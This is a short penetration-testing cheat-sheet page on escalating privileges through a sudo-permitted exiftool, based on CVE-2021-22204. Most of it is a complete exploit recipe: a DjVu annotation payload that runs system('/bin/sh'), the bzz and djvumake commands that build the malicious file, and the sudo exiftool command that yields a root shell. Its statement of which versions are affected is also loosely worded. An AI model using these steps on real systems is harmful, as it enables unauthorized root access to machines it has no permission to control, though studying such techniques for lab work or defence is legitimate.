Sudo Exiftool Privilege Escalation
Sudo exiftool command might be vulnerable to privilege escalation (PrivEsc).
(root) NOPASSWD: /usr/local/bin/exiftool
Copied!If we can execute "exiftool" command as root, we can gain access to privileges.
Reference: https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/
Check the exiftool version. If the exiftool version is later than 7.44, we can execute arbitrary code.
exiftool -ver
Copied!In local machine, create the payload in a file named “exploit”.
(metadata "\c${system('/bin/sh')};")
Copied!Next, compress the file.
bzz exploit exploit.bzz
Copied!Then create the DjVu file using the compressed file.
sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz
Copied!Now we have “exploit.djvu” file. Trasfer the file to the target machine and run exiftool as root given the DjVufile.
sudo /usr/local/bin/exiftool exploit.djvu
Copied!We should get a root shell.
Last updated